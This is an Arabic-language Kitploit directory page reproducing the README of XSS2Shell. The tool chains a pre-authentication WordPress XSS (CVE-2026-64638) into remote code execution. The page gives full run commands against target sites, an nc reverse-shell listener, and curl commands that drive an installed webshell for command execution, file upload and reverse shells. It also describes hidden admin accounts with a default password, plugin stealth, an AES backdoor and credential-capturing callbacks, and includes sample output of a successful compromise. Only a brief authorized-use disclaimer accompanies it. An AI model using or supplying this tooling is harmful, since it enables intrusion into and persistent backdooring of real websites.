Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XSS2Shell — يستغل ثغرة XSS قبل المصادقة في ووردبريس (CVE-2026-64638) لتحقيق تنفيذ التعليمات البرمجية عن بُعد، عبر تثبيت ويب شيل خلفي مشفّر بتقنية AES مع خيارات الثبات ورفع الملفات والصدفة العكسية والتخفي، لعمليات الفريق الأحمر المصرح بها. | Kitploit
أدوات/GitHubGitHub/g0d150ne/xss2shell
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubg0d150ne/xss2shell

XSS2Shell

يستغل ثغرة XSS قبل المصادقة في ووردبريس (CVE-2026-64638) لتحقيق تنفيذ التعليمات البرمجية عن بُعد، عبر تثبيت ويب شيل خلفي مشفّر بتقنية AES مع خيارات الثبات ورفع الملفات والصدفة العكسية والتخفي، لعمليات الفريق الأحمر المصرح بها.

6منذ 29 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

XSS2Shell ULTIMATE v3.0

سلسلة استغلال XSS قبل المصادقة → RCE في ووردبريس
تم التطوير بواسطة G0D150NE

📌 الميزات

  • 🔍 اكتشاف تلقائي لثغرات XSS وإصدار ووردبريس
  • 🎯 3 أوضاع: تلقائي، XSS، مباشر
  • 📡 خادم استدعاء لالتقاط بيانات الاعتماد
  • 🐚 WebShell بطرق تنفيذ متعددة
  • 🔄 استمرارية (مهمة مجدولة، مدير مخفي، تكرار ذاتي)
  • 📁 رفع/تنزيل الملفات
  • 🖥️ شل عكسي بنقرة واحدة
  • 🛡️ وضع التخفي (الإخفاء من قائمة الإضافات)
  • 🔐 باب خلفي مشفر بـ AES-256

📦 التثبيت

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 البدء السريع

1. إعداد المستمع

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. تشغيل الاستغلال

الوضع التلقائي (موصى به)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

وضع XSS (بدون بيانات اعتماد)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

الوضع المباشر (مع بيانات الاعتماد)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 تنفيذ الأوامر

بعد تثبيت WebShell:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 أمثلة الاستخدام

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 خيارات الأوامر

الخيارالوصفالافتراضي
targetعنوان URL المستهدف لوردبريسمطلوب
-u, --usernameاسم مستخدم مدير ووردبريس-
-p, --wp-passكلمة مرور مدير ووردبريس-
--lhostعنوان IP للمستمع127.0.0.1
--lportمنفذ المستمع4444
--modeوضع الاستغلال (auto/xss/direct)auto
--slugاسم slug للإضافةg0d150ne
--callback-portمنفذ خادم الاستدعاء9090
--backdoor-passكلمة مرور الباب الخلفيG0D150NE

🐚 ميزات WebShell

بعد نجاح الاستغلال:

الميزةالأمر
تنفيذ الأوامر?b2h=BASE64_CMD
رفع ملف-F '[email protected]'
شل عكسي?rev=1
أمر مباشر?cmd=id
باب خلفي مشفر?decrypt=AES_DATA

تم إنشاء مدير مخفي:

  • اسم المستخدم: sysadmin_{slug}
  • كلمة المرور: {backdoor-pass} (الافتراضي: G0D150NE)

📸 مثال على المخرجات

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 استكشاف الأخطاء وإصلاحها

المشكلةالحل
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
رفض الاتصالتحقق من المستمع: nc -lvnp 4444
فشل تسجيل الدخولتحقق من بيانات الاعتماد أو استخدم وضع XSS
فشل رفع الإضافةتحقق من الصلاحيات، استخدم slug مختلف
تعارض في الوسائطاستخدم -p لـ wp-pass، و --backdoor-pass للباب الخلفي

⚠️ إخلاء مسؤولية

للاستخدام التعليمي والاختبار المصرح به فقط.
استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

📞 التواصل

  • المؤلف: G0D150NE
  • CVE: CVE-2026-64638
تنزيل الأداة